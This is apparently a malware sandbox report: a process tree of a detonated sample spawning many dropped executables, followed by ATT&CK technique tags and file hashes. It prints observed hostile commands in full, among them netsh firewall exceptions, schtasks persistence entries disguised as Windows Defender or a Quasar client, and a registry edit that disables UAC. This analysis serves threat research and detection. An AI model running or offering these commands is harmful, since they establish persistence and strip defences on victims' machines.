C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"19⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE20⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"20⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"21⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE22⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"22⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"23⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE24⤵
- Modifies Windows Firewall
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV125⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"24⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"25⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE26⤵
- Modifies Windows Firewall
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV127⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"26⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"27⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE28⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"28⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"29⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE30⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"30⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"31⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE32⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"32⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"33⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE34⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"34⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"35⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE36⤵
- Modifies Windows Firewall
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Client.exe"C:\Users\Admin\AppData\Local\Temp\a\Client.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\G0swA6NniDB2.bat" "6⤵
-
C:\Windows\system32\chcp.comchcp 650017⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"7⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BqPGAUsBpn9n.bat" "8⤵
-
C:\Windows\system32\chcp.comchcp 650019⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"9⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f10⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CnaXsX1TeNU7.bat" "10⤵
-
C:\Windows\system32\chcp.comchcp 6500111⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost11⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"11⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f12⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CA5cwogItysU.bat" "12⤵
-
C:\Windows\system32\chcp.comchcp 6500113⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"13⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f14⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KVXg9vZd9jJh.bat" "14⤵
-
C:\Windows\system32\chcp.comchcp 6500115⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost15⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"15⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f16⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LBVLK1z8jKbI.bat" "16⤵
-
C:\Windows\system32\chcp.comchcp 6500117⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost17⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"17⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f18⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pNEJAFHAuMhB.bat" "18⤵
-
C:\Windows\system32\chcp.comchcp 6500119⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost19⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"19⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f20⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DlGsJB6FbMa5.bat" "20⤵
-
C:\Windows\system32\chcp.comchcp 6500121⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost21⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"21⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f22⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jDkbN1yqz6kW.bat" "22⤵
-
C:\Windows\system32\chcp.comchcp 6500123⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost23⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"23⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f24⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IAxB6MutSNKW.bat" "24⤵
-
C:\Windows\system32\chcp.comchcp 6500125⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"25⤵
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\jij.exe"C:\Users\Admin\AppData\Local\Temp\a\jij.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\a\333.exe"C:\Users\Admin\AppData\Local\Temp\a\333.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\a\coinbase.exe"C:\Users\Admin\AppData\Local\Temp\a\coinbase.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe"C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe"4⤵
-
C:\Windows\TEMP\{26A551DF-FA07-45A6-91A4-8E8706571D7F}\.cr\QGFQTHIU.exe"C:\Windows\TEMP\{26A551DF-FA07-45A6-91A4-8E8706571D7F}\.cr\QGFQTHIU.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe" -burn.filehandle.attached=608 -burn.filehandle.self=6685⤵
-
C:\Windows\TEMP\{B00EE861-5F15-4B39-AD1F-4F0FEEE39777}\.ba\msn.exeC:\Windows\TEMP\{B00EE861-5F15-4B39-AD1F-4F0FEEE39777}\.ba\msn.exe6⤵
-
C:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exeC:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exe7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe8⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe9⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe"C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe"4⤵
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"5⤵
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Lvj1jmfGyUQw.bat" "6⤵
-
C:\Windows\system32\chcp.comchcp 650017⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"7⤵
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hNM2iXfYOL98.bat" "8⤵
-
C:\Windows\system32\chcp.comchcp 650019⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"9⤵
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f10⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\712XeHf9L2C7.bat" "10⤵
-
C:\Windows\system32\chcp.comchcp 6500111⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost11⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"11⤵
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Servers.exe"C:\Users\Admin\AppData\Local\Temp\a\Servers.exe"4⤵
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\mac.exe"C:\Users\Admin\AppData\Local\Temp\a\mac.exe"4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"4⤵
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\ProgramData\System.exe"5⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SYSTEM32\shutdown.exeshutdown.exe /f /s /t 05⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"4⤵
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\a\windows.exe"C:\Users\Admin\AppData\Local\Temp\a\windows.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp921E.tmp.bat""6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\Users\Admin\AppData\Roaming\system.exe"C:\Users\Admin\AppData\Roaming\system.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\unins000.exe"C:\Users\Admin\AppData\Local\Temp\a\unins000.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\a\access.exe"C:\Users\Admin\AppData\Local\Temp\a\access.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\a\e.exe"C:\Users\Admin\AppData\Local\Temp\a\e.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\SecurityHealthHost.exe"C:\Users\Admin\AppData\Local\Temp\SecurityHealthHost.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\32098e40-152e-4409-9d42-1ab87834c62a.bat"8⤵
-
C:\Windows\system32\chcp.comchcp 650019⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 59689⤵
- Kills process with taskkill
-
-
C:\Windows\system32\timeout.exetimeout /T 2 /NOBREAK9⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 20326⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"5⤵
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OFoJtReauL5e.bat" "7⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"8⤵
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3lAZhxrGztVo.bat" "9⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500110⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"10⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 844 -s 22569⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 22727⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe"C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe"5⤵
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe"C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe"5⤵
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7⤵
- Modifies registry key
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe"7⤵
-
C:\ProgramData\GoogleDat\GoogleUpdate.exeC:\ProgramData\GoogleDat\GoogleUpdate.exe8⤵
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f9⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f10⤵
- Modifies registry key
-
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe9⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe"C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe"5⤵
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5676 -ip 56761⤵
-
C:\Users\Admin\AppData\Roaming\Network.exeC:\Users\Admin\AppData\Roaming\Network.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4660 -ip 46601⤵
-
C:\ProgramData\System.exeC:\ProgramData\System.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Network.exeC:\Users\Admin\AppData\Roaming\Network.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4136 -ip 41361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 844 -ip 8441⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa397c855 /state1:0x41c64e6d1⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
761KB
MD5c6040234ee8eaedbe618632818c3b1b3
SHA168115f8c3394c782aa6ba663ac78695d2b80bf75
SHA256bb459869e5ef6d6dd6f0329080d7cb12542c4b37163ae2cd782620adcd7d55a0
SHA512a3d8c8c6a990797a99887e0e07a01b1e2fe0a4e53df7294fed18a1e856d56a7762e0ab4a8e4689de411acb4fd29b8d7e247fbc696d855a9976a760d33ab60bcf
-
Filesize
15KB
MD57192a3d05bad80d246a8fd2e206b6816
SHA1f2e9ffcfa884ad3c900a9fc443d4a276b6e32952
SHA2563fdc15aef3ddb8a871db1fd0ef695facf3f106044921a8df857d20251e63de3f
SHA51280e385197b4add0ec69c76a19a8ef564c8cdda6d6004ef0ad9a46868d23977330a151972ef8d8857aad286c2ce2370a9c3b393b045c72331bab6a381177082a9
-
Filesize
8KB
MD569994ff2f00eeca9335ccd502198e05b
SHA1b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA2562e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
